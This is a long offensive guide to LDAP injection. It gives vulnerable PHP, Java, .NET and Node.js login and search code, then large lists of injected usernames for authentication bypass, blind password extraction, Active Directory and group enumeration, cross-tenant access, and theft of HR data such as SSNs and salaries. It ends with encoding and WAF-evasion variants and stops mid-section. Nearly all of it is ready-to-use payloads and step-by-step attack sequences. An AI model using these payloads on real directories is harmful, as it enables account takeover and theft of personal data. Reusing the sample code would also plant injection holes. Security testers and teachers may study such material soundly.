LDAP injection
Understanding LDAP Injection
What is LDAP Injection?
LDAP (Lightweight Directory Access Protocol) injection is a security vulnerability that occurs when user-supplied input is incorporated into LDAP statements without proper validation or sanitization. This allows attackers to manipulate LDAP queries to access unauthorized information, bypass authentication, or modify directory data.
Vulnerable Code Example
// PHP vulnerable LDAP authentication
$username = $_POST['username'];
$password = $_POST['password'];
$ldap_filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_conn, $base_dn, $ldap_filter);
if (ldap_count_entries($ldap_conn, $result) > 0) {
echo "Authentication successful";
} else {
echo "Authentication failed";
}Normal Request:
Username:
johnPassword:
secret123Filter:
(&(uid=john)(userPassword=secret123))
Malicious Request:
Username:
admin)(&(uid=adminPassword:
anythingFilter:
(&(uid=admin)(&(uid=admin)(userPassword=anything))
How LDAP Injection Works
LDAP injection exploits the way applications construct LDAP search filters and bind operations. When user input is directly concatenated into LDAP queries without proper escaping, attackers can inject LDAP special characters to modify the query logic.
LDAP Query Structure
Basic LDAP Filter Syntax:
(attribute=value)- Equality filter(!(attribute=value))- Negation filter(&(filter1)(filter2))- AND operation(|(filter1)(filter2))- OR operation(attribute=value*)- Wildcard matching(attribute>=value)- Greater than or equal(attribute<=value)- Less than or equal
Impact and Consequences
Authentication Bypass - Access without valid credentials
Information Disclosure - Enumeration of directory data
Privilege Escalation - Access to administrative accounts
Data Modification - Unauthorized changes to directory entries
Denial of Service - Malformed queries causing service disruption
LDAP Special Characters and Metacharacters
Understanding LDAP special characters is crucial for both exploitation and defense:
Filter Metacharacters
(- Start of filter)- End of filter&- AND operator|- OR operator!- NOT operator*- Wildcard character\- Escape character=- Equality operator>=- Greater than or equal<=- Less than or equal~=- Approximate match
Distinguished Name (DN) Special Characters
,- Separator between RDN components=- Separator between attribute and value+- Multi-valued RDN separator"- Quoted string delimiter\- Escape character;- Alternative separator (deprecated)<- Less than symbol>- Greater than symbol
Detection Methodology
Identifying Vulnerable Parameters
Common LDAP Integration Points
Authentication Systems:
Login forms
Password reset mechanisms
User registration
Single Sign-On (SSO) implementations
Multi-factor authentication
User Management:
User search functionality
Profile management
Group membership queries
Permission verification
User enumeration features
Application Integration:
Employee directories
Contact lists
Organizational charts
Access control systems
Email address lookups
Vulnerable Function Patterns
PHP LDAP Functions:
ldap_search()ldap_list()ldap_read()ldap_bind()ldap_compare()ldap_modify()ldap_add()ldap_delete()
Java LDAP Functions:
DirContext.search()LdapContext.search()InitialDirContext.search()LdapTemplate.search()LdapTemplate.authenticate()
ASP.NET LDAP Functions:
DirectorySearcher.FilterDirectoryEntry.PathPrincipalSearcher.QueryFilterDirectoryServices.Search()
Basic Detection Techniques
Authentication Bypass Testing
AND Logic Bypass:
# Test various AND bypass techniques
username: admin)(&(uid=admin
password: anything
username: admin))%00
password: anything
username: admin)|(uid=*
password: anythingOR Logic Injection:
# Inject OR conditions
username: *)(uid=*)|(uid=*
password: anything
username: admin)|(|(uid=admin
password: anything
username: *)(|(objectClass=*
password: anythingWildcard Injection:
# Use wildcards for authentication bypass
username: *
password: *
username: admin*
password: *
username: a*
password: *Boolean-Based Testing
True/False Conditions:
# Test boolean responses
username: admin)(&(1=1
password: anything
username: admin)(&(1=2
password: anything
# Check response differences
username: admin)(&(objectClass=person
password: anything
username: admin)(&(objectClass=invalidclass
password: anythingExistence Testing:
# Test attribute existence
username: admin)(&(uid=*
password: anything
username: admin)(&(mail=*
password: anything
username: admin)(&(telephoneNumber=*
password: anythingError-Based Detection
Syntax Error Injection:
# Generate LDAP syntax errors
username: admin)(
password: anything
username: admin))
password: anything
username: admin)(&
password: anything
username: admin)(&(
password: anythingInvalid Filter Testing:
# Invalid filter constructions
username: admin)(&(invalid
password: anything
username: admin)(&(=value
password: anything
username: admin)(&(attr=
password: anythingAdvanced Detection Techniques
Blind LDAP Injection
Time-Based Detection:
# Time-based testing (server-dependent)
username: admin)(&(cn=admin*)(cn=a*
password: anything
username: admin)(&(cn=admin*)(cn=b*
password: anything
# Character-by-character enumeration
username: admin)(&(userPassword=a*
password: anything
username: admin)(&(userPassword=b*
password: anythingContent-Length Based:
# Response size analysis
username: *
password: anything
username: a*
password: anything
username: admin*
password: anything
# Monitor response sizes for information leakageAttribute Enumeration
Common Attribute Testing:
# Test for standard LDAP attributes
username: admin)(&(mail=*
password: anything
username: admin)(&(telephoneNumber=*
password: anything
username: admin)(&(department=*
password: anything
username: admin)(&(title=*
password: anything
username: admin)(&(employeeNumber=*
password: anythingCustom Attribute Discovery:
# Application-specific attributes
username: admin)(&(customField=*
password: anything
username: admin)(&(permissions=*
password: anything
username: admin)(&(role=*
password: anything
username: admin)(&(accessLevel=*
password: anythingAuthentication Bypass Techniques
AND Logic Manipulation
Basic AND Bypass
Filter Structure Manipulation:
# Original filter: (&(uid=username)(userPassword=password))
# Bypass technique 1
username: admin)(&(uid=admin
password: anything
# Result: (&(uid=admin)(&(uid=admin)(userPassword=anything))
# Bypass technique 2
username: admin))%00
password: anything
# Result: (&(uid=admin))%00)(userPassword=anything))
# Bypass technique 3
username: admin)(&(objectClass=*
password: anything
# Result: (&(uid=admin)(&(objectClass=*)(userPassword=anything))Comment-Based Bypass:
# Using null byte or comment injection
username: admin%00
password: anything
username: admin#
password: anything
# Some implementations may ignore content after null byteAdvanced AND Manipulation
Nested Filter Injection:
# Complex nested filter manipulation
username: admin)(&(|(uid=admin)(uid=root
password: anything
# Result: (&(uid=admin)(&(|(uid=admin)(uid=root)(userPassword=anything))
# Multiple condition injection
username: admin)(&(uid=admin)(&(objectClass=person
password: anything
# Result: (&(uid=admin)(&(uid=admin)(&(objectClass=person)(userPassword=anything))OR Logic Exploitation
Basic OR Injection
Always True Conditions:
# OR with wildcard (always true)
username: *)(uid=*)|(uid=*
password: anything
# Result: (&(uid=*)(uid=*)|(uid=*)(userPassword=anything))
# OR with object class
username: admin)|(objectClass=*
password: anything
# Result: (&(uid=admin)|(objectClass=*)(userPassword=anything))
# OR with always true condition
username: admin)|(uid=*
password: anything
# Result: (&(uid=admin)|(uid=*)(userPassword=anything))Multi-User Bypass
Targeting Multiple Accounts:
# Target multiple administrative accounts
username: admin)|(uid=administrator)|(uid=root
password: anything
# Target any privileged user
username: admin)|(memberOf=cn=admins,ou=groups,dc=example,dc=com
password: anything
# Target any user with email
username: admin)|(mail=*
password: anythingWildcard Exploitation
Universal Wildcards
Complete Wildcard Bypass:
# Universal access attempt
username: *
password: *
# Single character wildcard
username: ?
password: ?
# Partial wildcard matching
username: a*
password: *
username: admin*
password: *Targeted Wildcard Attacks
Specific User Targeting:
# Target users starting with 'admin'
username: admin*
password: *
# Target specific user patterns
username: service*
password: *
username: test*
password: *
# Target by department
username: *)(&(department=IT*
password: anythingInformation Disclosure Techniques
User Enumeration
Username Discovery
Alphabetic Enumeration:
# Enumerate usernames by starting letter
username: a*
username: b*
username: c*
# ... continue through alphabet
# Two-character enumeration
username: aa*
username: ab*
username: ac*
# ... more granular enumerationPattern-Based Discovery:
# Common username patterns
username: admin*
username: user*
username: test*
username: service*
username: guest*
# Email-based usernames
username: *.smith*
username: *.john*
username: *.admin*Account Information Extraction
Personal Information:
# Extract user details
username: admin)(&(mail=*@company.com*
password: anything
username: admin)(&(telephoneNumber=555*
password: anything
username: admin)(&(cn=John*
password: anything
username: admin)(&(sn=Smith*
password: anythingOrganizational Information:
# Department enumeration
username: admin)(&(department=*
password: anything
username: admin)(&(ou=*
password: anything
# Job title extraction
username: admin)(&(title=*Manager*
password: anything
username: admin)(&(title=*Director*
password: anythingGroup and Permission Discovery
Group Membership Enumeration
Administrative Groups:
# Discover admin group members
username: admin)(&(memberOf=*admin*
password: anything
username: admin)(&(memberOf=*root*
password: anything
username: admin)(&(memberOf=*wheel*
password: anything
# Enumerate group DNs
username: admin)(&(memberOf=cn=*,ou=groups*
password: anythingDepartment Groups:
# Department-based groups
username: admin)(&(memberOf=*IT*
password: anything
username: admin)(&(memberOf=*HR*
password: anything
username: admin)(&(memberOf=*Finance*
password: anything
username: admin)(&(memberOf=*Security*
password: anythingPermission Structure Discovery
Access Control Attributes:
# Permission-related attributes
username: admin)(&(accessRights=*
password: anything
username: admin)(&(permissions=*
password: anything
username: admin)(&(role=*
password: anything
username: admin)(&(privilegeLevel=*
password: anythingSecurity Clearance:
# Security level enumeration
username: admin)(&(securityClearance=*
password: anything
username: admin)(&(accessLevel=*
password: anything
username: admin)(&(classification=*
password: anythingApplication-Specific LDAP Injection
Authentication Systems
Single Sign-On (SSO) Bypass
SAML-Based SSO:
# SAML assertion manipulation
username: admin)(&(uid=admin)(!(disabled=*
password: anything
# NameID injection
username: admin@company.com)(&(mail=admin@company.com*
password: anything
# Attribute-based bypass
username: admin)(&(role=administrator*
password: anythingOAuth/OpenID Integration:
# OAuth attribute injection
username: admin)(&(oauth_id=*
password: anything
# Social media integration bypass
username: admin)(&(facebook_id=*
password: anything
username: admin)(&(google_id=*
password: anythingMulti-Factor Authentication
MFA Bypass Attempts:
# Bypass MFA requirements
username: admin)(&(mfaEnabled=false*
password: anything
username: admin)(&(!(mfaRequired=*
password: anything
# Token-based MFA bypass
username: admin)(&(mfaToken=*
password: anythingWeb Application Integration
User Search Functionality
Directory Search Injection:
<!-- Search form injection -->
<form action="/search" method="POST">
<input name="searchTerm" value="smith)(&(uid=admin*" />
<input name="department" value="*" />
</form>Advanced Search Filters:
# Multi-field search injection
searchTerm: *)(&(department=IT)(&(title=Manager*
location: *
department: *
# Boolean search injection
searchTerm: smith)|(|(cn=admin*
criteria: nameProfile Management
Profile Update Injection:
# Profile field injection
firstName: John)(&(uid=admin*
lastName: *
email: user@company.com
# Description field injection
description: Employee)(&(role=administrator*
title: *
department: *Contact Information:
# Phone number injection
phone: 555-1234)(&(mobile=*
address: *
zipcode: *
# Email injection
email: user@company.com)(&(mail=admin@*
alternateEmail: *Enterprise Applications
Employee Directory Systems
Employee Lookup Injection:
# Employee ID injection
employeeId: 12345)(&(manager=*admin*
name: *
department: *
# Badge number injection
badgeNumber: B001)(&(accessLevel=*
building: *
floor: *Organizational Chart:
# Manager hierarchy injection
manager: Smith)(&(title=*Director*
subordinate: *
reporting: *
# Team structure injection
team: Development)(&(lead=*
project: *
role: *Customer Relationship Management
Customer Search Injection:
# Customer ID injection
customerId: CUST001)(&(status=VIP*
customerName: *
tier: *
# Account lookup injection
accountNumber: ACC123)(&(creditLimit=*
status: *
type: *Advanced LDAP Injection Techniques
Blind LDAP Injection Exploitation
Character-by-Character Extraction
Password Enumeration:
# Extract password character by character
# Position 1
username: admin)(&(userPassword=a*
username: admin)(&(userPassword=b*
username: admin)(&(userPassword=c*
# ... continue until response indicates match
# Position 2 (assuming first character is 'p')
username: admin)(&(userPassword=pa*
username: admin)(&(userPassword=pb*
username: admin)(&(userPassword=pc*
# ... continue enumerationAttribute Value Extraction:
# Extract email address
username: admin)(&(mail=a*
username: admin)(&(mail=admin@*
username: admin)(&(mail=admin@company*
username: admin)(&(mail=admin@company.com*
# Extract phone number
username: admin)(&(telephoneNumber=555*
username: admin)(&(telephoneNumber=555-1*
username: admin)(&(telephoneNumber=555-12*Time-Based Extraction
Response Time Analysis:
# Large result set for timing
username: admin)(&(|(uid=a*)(uid=b*)(uid=c*
# vs small result set
username: admin)(&(uid=nonexistent*
# Complex query timing
username: admin)(&(memberOf=cn=admins,ou=groups,dc=example,dc=com*
# vs simple query
username: admin)(&(uid=admin*Content-Length Analysis
Response Size Comparison:
# Different response sizes for valid vs invalid
username: * # Large response (all users)
username: admin* # Medium response (admin users)
username: adminnonexistent* # Small response (no users)
# Incremental size analysis
username: a* # Size for users starting with 'a'
username: ad* # Size for users starting with 'ad'
username: adm* # Size for users starting with 'adm'Filter Injection Techniques
Complex Boolean Logic
Nested AND/OR Combinations:
# Complex nested logic
username: admin)(&(|(uid=admin)(uid=root))(&(objectClass=person*
password: anything
# Multiple condition chaining
username: admin)(&(uid=admin)(&(!(disabled=true))(&(active=true*
password: anything
# Conditional attribute testing
username: admin)(&(|(department=IT)(department=Security))(&(role=admin*
password: anythingApproximation Attacks
Fuzzy Matching Exploitation:
# Approximate match operator (~=)
username: admin)(&(cn~=administrator*
password: anything
username: admin)(&(mail~=admin@company*
password: anything
# Phonetic matching (if supported)
username: admin)(&(sn~=smith*
password: anythingRange-Based Attacks
Numeric Range Exploitation:
# Employee ID ranges
username: admin)(&(employeeId>=1000*
password: anything
username: admin)(&(employeeId<=9999*
password: anything
# Date-based ranges
username: admin)(&(createTimestamp>=20230101000000Z*
password: anything
username: admin)(&(modifyTimestamp<=20231231235959Z*
password: anythingProtocol-Specific Techniques
LDAPS (LDAP over SSL/TLS)
Certificate-Based Attacks:
# Certificate subject injection
username: admin)(&(userCertificate;binary=*
password: anything
# Certificate serial number
username: admin)(&(certificateSerialNumber=*
password: anythingLDAP Referrals
Referral Manipulation:
# Referral URL injection
username: admin)(&(ref=ldap://malicious.server/*
password: anything
# Cross-domain referral
username: admin)(&(ref=ldap://target.domain/dc=target,dc=domain*
password: anythingExtended Operations
Extended Request Injection:
# Password modify extended operation
username: admin)(&(pwdChangedTime=*
password: anything
# Start TLS injection
username: admin)(&(supportedExtension=1.3.6.1.4.1.1466.20037*
password: anythingPlatform-Specific LDAP Injection
Active Directory Exploitation
Active Directory Specific Attributes
AD-Specific Enumeration:
# samAccountName injection
username: admin)(&(samAccountName=administrator*
password: anything
# userPrincipalName injection
username: admin)(&(userPrincipalName=admin@domain.com*
password: anything
# distinguishedName injection
username: admin)(&(distinguishedName=CN=Administrator,CN=Users,DC=domain,DC=com*
password: anythingSecurity Identifier (SID) Attacks:
# objectSid enumeration
username: admin)(&(objectSid=S-1-5-21-*500
password: anything
# Well-known SID injection
username: admin)(&(objectSid=S-1-5-32-544* # Local Administrators
password: anything
username: admin)(&(objectSid=S-1-5-32-548* # Account Operators
password: anythingGroup Policy and Permissions
Group Policy Object (GPO) Injection:
# GPO link discovery
username: admin)(&(gPLink=*
password: anything
# Group policy enumeration
username: admin)(&(objectClass=groupPolicyContainer*
password: anything
# GPO permissions
username: admin)(&(nTSecurityDescriptor=*
password: anythingAccess Control List (ACL) Exploitation:
# ACL enumeration
username: admin)(&(nTSecurityDescriptor=*ADMIN*
password: anything
# Permission inheritance
username: admin)(&(inheritanceFlags=*
password: anything
# Extended rights
username: admin)(&(rightsGuid=*
password: anythingDomain Trust Relationships
Trust Enumeration:
# Trusted domain discovery
username: admin)(&(trustPartner=*
password: anything
# Trust direction
username: admin)(&(trustDirection=*
password: anything
# Cross-domain user enumeration
username: admin)(&(userPrincipalName=*@trusted.domain*
password: anythingOpenLDAP Exploitation
OpenLDAP Schema Exploitation
Schema Discovery:
# Attribute type enumeration
username: admin)(&(attributeTypes=*
password: anything
# Object class discovery
username: admin)(&(objectClasses=*
password: anything
# Supported extensions
username: admin)(&(supportedExtension=*
password: anythingAccess Control Information (ACI):
# ACI enumeration
username: admin)(&(aci=*
password: anything
# Access control policy
username: admin)(&(aclRights=*
password: anything
# Permission targets
username: admin)(&(targetattr=*
password: anythingOpenLDAP Overlays
ppolicy Overlay Exploitation:
# Password policy attributes
username: admin)(&(pwdPolicySubentry=*
password: anything
# Password history
username: admin)(&(pwdHistory=*
password: anything
# Account lockout status
username: admin)(&(pwdAccountLockedTime=*
password: anythingmemberof Overlay:
# Dynamic group membership
username: admin)(&(memberOf=*
password: anything
# Reverse group lookup
username: admin)(&(member=*admin*
password: anything389 Directory Server
389 DS Specific Features
Role-Based Access Control:
# Role enumeration
username: admin)(&(nsRole=*
password: anything
# Role definition
username: admin)(&(objectClass=nsRoleDefinition*
password: anything
# Managed roles
username: admin)(&(objectClass=nsManagedRoleDefinition*
password: anythingAccount Policy:
# Account inactivation
username: admin)(&(nsAccountLock=*
password: anything
# Password syntax checking
username: admin)(&(passwordCheckSyntax=*
password: anything
# Account policy state
username: admin)(&(accountUnlockTime=*
password: anythingClass of Service (CoS)
CoS Template Discovery:
# CoS template enumeration
username: admin)(&(objectClass=cosTemplate*
password: anything
# CoS definition
username: admin)(&(objectClass=cosSuperDefinition*
password: anything
# Indirect CoS
username: admin)(&(cosIndirectSpecifier=*
password: anythingWeb Application Framework Integration
PHP LDAP Integration
PHP-Specific Vulnerabilities
Common PHP LDAP Patterns:
<?php
// Vulnerable authentication function
function authenticate($username, $password) {
$ldap_conn = ldap_connect("ldap://ldap.company.com");
// Vulnerable filter construction
$filter = "(&(uid=$username)(userPassword=$password))";
$search = ldap_search($ldap_conn, "dc=company,dc=com", $filter);
return ldap_count_entries($ldap_conn, $search) > 0;
}
// Vulnerable user search
function searchUsers($searchTerm) {
$ldap_conn = ldap_connect("ldap://ldap.company.com");
// Vulnerable search filter
$filter = "(|(cn=*$searchTerm*)(mail=*$searchTerm*))";
$search = ldap_search($ldap_conn, "ou=users,dc=company,dc=com", $filter);
return ldap_get_entries($ldap_conn, $search);
}
?>PHP LDAP Injection Payloads:
# PHP-specific authentication bypass
username: admin)(%00(&(uid=admin
password: anything
# PHP null byte injection
username: admin%00)(&(uid=admin
password: anything
# PHP comment injection
username: admin#)(&(uid=admin
password: anythingPHP Framework Integration
Laravel LDAP Integration:
<?php
// Vulnerable Laravel LDAP authentication
use Adldap\Laravel\Facades\Adldap;
class AuthController extends Controller {
public function authenticate(Request $request) {
$username = $request->input('username');
$password = $request->input('password');
// Vulnerable LDAP query
$user = Adldap::search()
->whereRaw("(&(samAccountName=$username)(userPassword=$password))")
->first();
return $user ? 'success' : 'failed';
}
}
?>Java/Spring LDAP Integration
Spring LDAP Vulnerabilities
Spring LDAP Template:
// Vulnerable Spring LDAP authentication
@Service
public class LdapAuthenticationService {
@Autowired
private LdapTemplate ldapTemplate;
public boolean authenticate(String username, String password) {
// Vulnerable filter construction
String filter = "(&(uid=" + username + ")(userPassword=" + password + "))";
List<String> results = ldapTemplate.search(
"ou=users",
filter,
new AttributesMapper<String>() {
public String mapFromAttributes(Attributes attrs) {
return attrs.get("uid").toString();
}
}
);
return !results.isEmpty();
}
}Spring Security LDAP:
// Vulnerable Spring Security LDAP configuration
@Configuration
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
@Override
protected void configure(AuthenticationManagerBuilder auth) throws Exception {
auth.ldapAuthentication()
.userSearchBase("ou=users")
// Vulnerable user search filter
.userSearchFilter("(uid={0})")
.groupSearchBase("ou=groups")
// Vulnerable group search filter
.groupSearchFilter("(member={0})")
.contextSource()
.url("ldap://ldap.company.com:389/dc=company,dc=com");
}
}Java Enterprise Integration
JNDI LDAP Injection:
// Vulnerable JNDI LDAP lookup
public class UserService {
public User findUser(String username) {
try {
InitialDirContext ctx = new InitialDirContext();
// Vulnerable search filter
String filter = "(&(objectClass=person)(uid=" + username + "))";
SearchControls controls = new SearchControls();
controls.setSearchScope(SearchControls.SUBTREE_SCOPE);
NamingEnumeration<SearchResult> results = ctx.search(
"ou=users,dc=company,dc=com",
filter,
controls
);
// Process results...
return processResults(results);
} catch (NamingException e) {
throw new RuntimeException("LDAP search failed", e);
}
}
}.NET/ASP.NET LDAP Integration
.NET DirectoryServices Vulnerabilities
DirectorySearcher Injection:
// Vulnerable .NET LDAP authentication
using System.DirectoryServices;
public class LdapAuthenticator {
public bool Authenticate(string username, string password) {
try {
using (DirectoryEntry entry = new DirectoryEntry()) {
entry.Path = "LDAP://ldap.company.com/dc=company,dc=com";
using (DirectorySearcher searcher = new DirectorySearcher(entry)) {
// Vulnerable filter construction
searcher.Filter = $"(&(uid={username})(userPassword={password}))";
SearchResult result = searcher.FindOne();
return result != null;
}
}
} catch (Exception ex) {
return false;
}
}
}ASP.NET Identity Integration:
// Vulnerable ASP.NET Identity LDAP provider
public class LdapUserStore : IUserStore<ApplicationUser> {
public async Task<ApplicationUser> FindByNameAsync(string userName) {
using (DirectoryEntry entry = new DirectoryEntry()) {
entry.Path = "LDAP://ldap.company.com/dc=company,dc=com";
using (DirectorySearcher searcher = new DirectorySearcher(entry)) {
// Vulnerable user search
searcher.Filter = $"(samAccountName={userName})";
SearchResult result = searcher.FindOne();
if (result != null) {
return MapToApplicationUser(result);
}
}
}
return null;
}
}Node.js LDAP Integration
Node.js LDAP Libraries
ldapjs Vulnerabilities:
// Vulnerable Node.js LDAP authentication
const ldap = require('ldapjs');
function authenticate(username, password, callback) {
const client = ldap.createClient({
url: 'ldap://ldap.company.com:389'
});
// Vulnerable filter construction
const filter = `(&(uid=${username})(userPassword=${password}))`;
const opts = {
filter: filter,
scope: 'sub',
attributes: ['uid', 'cn', 'mail']
};
client.search('dc=company,dc=com', opts, (err, res) => {
let found = false;
res.on('searchEntry', (entry) => {
found = true;
});
res.on('end', () => {
callback(null, found);
});
res.on('error', (err) => {
callback(err, false);
});
});
}
// Vulnerable user search function
function searchUsers(searchTerm, callback) {
const client = ldap.createClient({
url: 'ldap://ldap.company.com:389'
});
// Vulnerable search filter
const filter = `(|(cn=*${searchTerm}*)(mail=*${searchTerm}*))`;
const opts = {
filter: filter,
scope: 'sub',
attributes: ['uid', 'cn', 'mail', 'department']
};
client.search('ou=users,dc=company,dc=com', opts, (err, res) => {
const results = [];
res.on('searchEntry', (entry) => {
results.push(entry.object);
});
res.on('end', () => {
callback(null, results);
});
});
}Passport.js LDAP Strategy:
// Vulnerable Passport LDAP strategy
const passport = require('passport');
const LdapStrategy = require('passport-ldapauth');
passport.use(new LdapStrategy({
server: {
url: 'ldap://ldap.company.com:389',
bindDN: 'cn=admin,dc=company,dc=com',
bindCredentials: 'admin_password',
searchBase: 'ou=users,dc=company,dc=com',
// Vulnerable search filter
searchFilter: '(uid={{username}})', // Should be escaped
searchAttributes: ['uid', 'cn', 'mail']
}
}, (user, done) => {
return done(null, user);
}));Express.js LDAP Integration
Express Route Vulnerabilities:
// Vulnerable Express.js LDAP endpoints
const express = require('express');
const ldap = require('ldapjs');
const app = express();
// Vulnerable login endpoint
app.post('/login', (req, res) => {
const { username, password } = req.body;
const client = ldap.createClient({
url: 'ldap://ldap.company.com:389'
});
// Vulnerable filter - direct concatenation
const filter = `(&(uid=${username})(userPassword=${password}))`;
client.search('dc=company,dc=com', { filter }, (err, search) => {
let authenticated = false;
search.on('searchEntry', () => {
authenticated = true;
});
search.on('end', () => {
res.json({ success: authenticated });
});
});
});
// Vulnerable user search endpoint
app.get('/users/search', (req, res) => {
const { query, department } = req.query;
const client = ldap.createClient({
url: 'ldap://ldap.company.com:389'
});
// Vulnerable multi-parameter filter
const filter = `(&(|(cn=*${query}*)(mail=*${query}*))(department=${department}))`;
client.search('ou=users,dc=company,dc=com', { filter }, (err, search) => {
const results = [];
search.on('searchEntry', (entry) => {
results.push(entry.object);
});
search.on('end', () => {
res.json(results);
});
});
});Real-World Attack Scenarios
Enterprise SSO Bypass
Corporate Authentication System
Scenario: Large Enterprise SSO
# Target: Corporate SSO portal
# Vulnerable parameter: username field in login form
# Step 1: Identify LDAP injection point
POST /sso/authenticate
Content-Type: application/x-www-form-urlencoded
username=testuser&password=testpass
# Step 2: Test for injection
username=testuser)(&(uid=testuser&password=anything
# Step 3: Attempt authentication bypass
username=admin)(&(uid=admin&password=anything
# Step 4: Extract administrative accounts
username=*)(&(memberOf=*admin*&password=anything
# Step 5: Enumerate high-privilege users
username=*)(&(title=*director*&password=anything
username=*)(&(title=*manager*&password=anything
username=*)(&(department=security*&password=anythingMulti-Domain Environment
Cross-Domain Exploitation:
# Target: Multi-domain corporate environment
# Domains: corp.company.com, dev.company.com, prod.company.com
# Enumerate domains
username=admin)(&(userPrincipalName=*@corp.company.com*
username=admin)(&(userPrincipalName=*@dev.company.com*
username=admin)(&(userPrincipalName=*@prod.company.com*
# Cross-domain privilege escalation
username=admin)(&(memberOf=*,DC=corp,DC=company,DC=com*
username=admin)(&(memberOf=*,DC=dev,DC=company,DC=com*
# Service account discovery
username=svc*)(&(servicePrincipalName=*
username=service*)(&(objectClass=user*
username=*)(&(userAccountControl=*SERVICE*Customer Portal Exploitation
SaaS Application Attack
Scenario: Multi-Tenant SaaS Platform
# Target: Customer portal with LDAP backend
# Goal: Access other customers' data
# Step 1: Identify tenant isolation
username=user@tenant1.com)(&(mail=*@tenant1.com*
password=anything
# Step 2: Attempt cross-tenant access
username=user@tenant1.com)(&(mail=*@tenant2.com*
password=anything
# Step 3: Enumerate all tenants
username=user@tenant1.com)(&(mail=*@*
password=anything
# Step 4: Target administrative accounts
username=user@tenant1.com)(&(mail=admin@*
username=user@tenant1.com)(&(mail=root@*
username=user@tenant1.com)(&(cn=*administrator*
# Step 5: Extract sensitive attributes
username=user@tenant1.com)(&(customerId=*
username=user@tenant1.com)(&(billingInfo=*
username=user@tenant1.com)(&(accountType=premium*E-commerce Platform
Customer Account Takeover:
# Target: E-commerce customer accounts
# Goal: Account takeover and data extraction
# Customer enumeration
username=customer)(&(email=*@gmail.com*
username=customer)(&(email=*@yahoo.com*
username=customer)(&(email=*@hotmail.com*
# High-value customer targeting
username=customer)(&(accountType=premium*
username=customer)(&(loyaltyLevel=gold*
username=customer)(&(totalPurchases>=10000*
# Payment information discovery
username=customer)(&(paymentMethod=*
username=customer)(&(creditCardLast4=*
username=customer)(&(billingAddress=*
# Order history enumeration
username=customer)(&(lastOrderDate=*
username=customer)(&(orderCount>=*
username=customer)(&(favoriteCategory=*Internal Directory Exploitation
HR System Attack
Employee Information Extraction:
# Target: HR management system
# Goal: Complete employee database extraction
# Basic employee enumeration
username=employee)(&(employeeType=fulltime*
username=employee)(&(employeeType=contractor*
username=employee)(&(employeeType=intern*
# Salary and compensation data
username=employee)(&(salary=*
username=employee)(&(payGrade=*
username=employee)(&(bonus=*
username=employee)(&(stockOptions=*
# Personal information extraction
username=employee)(&(ssn=*
username=employee)(&(dateOfBirth=*
username=employee)(&(emergencyContact=*
username=employee)(&(homeAddress=*
# Performance and review data
username=employee)(&(performanceRating=*
username=employee)(&(reviewDate=*
username=employee)(&(disciplinaryAction=*IT Asset Management
Infrastructure Discovery:
# Target: IT asset management system
# Goal: Infrastructure mapping and security assessment
# Computer and server enumeration
username=admin)(&(objectClass=computer*
username=admin)(&(operatingSystem=Windows*
username=admin)(&(operatingSystem=Linux*
username=admin)(&(operatingSystem=*Server*
# Service account discovery
username=admin)(&(servicePrincipalName=HTTP/*
username=admin)(&(servicePrincipalName=MSSQL/*
username=admin)(&(servicePrincipalName=LDAP/*
username=admin)(&(servicePrincipalName=FTP/*
# Network infrastructure
username=admin)(&(dNSHostName=*.domain.com*
username=admin)(&(ipAddress=192.168.*
username=admin)(&(networkAddress=10.*
# Security groups and permissions
username=admin)(&(memberOf=*server*admin*
username=admin)(&(memberOf=*backup*operator*
username=admin)(&(memberOf=*domain*admin*Advanced Evasion Techniques
Filter Encoding and Obfuscation
Character Encoding Methods
URL Encoding:
# Standard URL encoding
username: admin%29%28%26%28uid%3Dadmin
# Decoded: admin)(&(uid=admin
# Double URL encoding
username: admin%2529%2528%2526%2528uid%253Dadmin
# Decoded: admin)(&(uid=admin
# Mixed encoding
username: admin%29(&(uid%3Dadmin
# Partially encoded injectionUnicode Encoding:
# Unicode full-width characters
username: admin)(&(uid=admin
# Unicode alternatives for parentheses and operators
# Unicode normalization bypass
username: admin\u0029\u0028\u0026\u0028uid\u003Dadmin
# Unicode escape sequences
# Mixed Unicode and ASCII
username: admin)(&(uid=admin
# Combining different character setsHTML Entity Encoding:
# HTML entity encoding
username: admin)(&(uid=admin
# Decimal entities
username: admin)(&(uid=admin
# Hexadecimal entities
# Mixed entity encoding
username: admin)(&(uid=admin
# Partial entity encodingAlternative Representations
Case Variation:
# Mixed case attributes
username: admin)(&(UID=admin
username: admin)(&(Uid=admin
username: admin)(&(uId=admin
# Mixed case operators
username: admin)(&(uid=admin)(ObjectClass=person
username: admin)(&(uid=admin)(OBJECTCLASS=person
# Case-sensitive bypass attempts
username: ADMIN)(&(uid=admin
username: Admin)(&(uid=adminWhitespace Manipulation:
# Extra whitespace
username: admin ) ( & ( uid = admin
username: admin)( &(uid=admin
# Tab characters
username: admin)(\t&\t(uid=admin
username: admin)\t(&(uid=admin
# Newline injection
username: admin)\n(&(uid=admin
username: admin)\r\n(&(uid=adminComplex Filter Construction
Nested Filter Evasion
Deep Nesting:
# Multiple nesting levels
username: admin)(&(|(uid=admin)(|(cn=admin)(|(mail=admin*)(sn=admin*
password: anything
# Recursive filter construction
username: admin)(&(uid=admin)(&(uid=admin)(&(objectClass=person*
password: anything
# Complex boolean logic
username: admin)(&(|(!(disabled=true))(!(locked=true)))(&(active=true*
password: anythingFilter Fragmentation:
# Split across parameters
username: admin)(&(uid=admin
password: )(&(objectClass=person))(userPassword=anything
# Multi-field injection
username: admin*
department: )(&(memberOf=*admin*
location: )(&(title=*manager*Timing-Based Evasion
Conditional Delays:
# Large result set timing
username: *)(&(|(uid=a*)(uid=b*)(uid=c*)(uid=d*)(uid=e*
password: anything
# Complex computation timing
username: admin)(&(memberOf=cn=*,ou=groups,ou=*,ou=*,dc=*,dc=*
password: anything
# Recursive attribute lookup
username: admin)(&(manager=cn=*,ou=users,dc=company,dc=com*
password: anythingWAF and Filter Bypass
Common WAF Evasion
Keyword Avoidance:
# Avoid 'admin' keyword
username: adm*)(&(uid=adm*
username: a*in)(&(uid=admin
# Attribute name variations
username: user)(&(samAccountName=admin* # Instead of uid
username: user)(&(cn=admin* # Instead of uid
username: user)(&(displayName=admin* # Instead of uidPattern Breaking:
# Break common injection patterns
username: user)(objectClass=person)(&(uid=admin
# Instead of: user)(&(uid=admin
username: user)(!objectClass=computer)(&(uid=admin
# Using negation to break patterns
username: user)(uid>=a)(&(uid<=z)(&(uid=admin
# Using comparison operatorsLength-Based Evasion
Payload Truncation:
# Short payloads to avoid length limits
username: *)|(uid=*
username: a*)|(cn=*
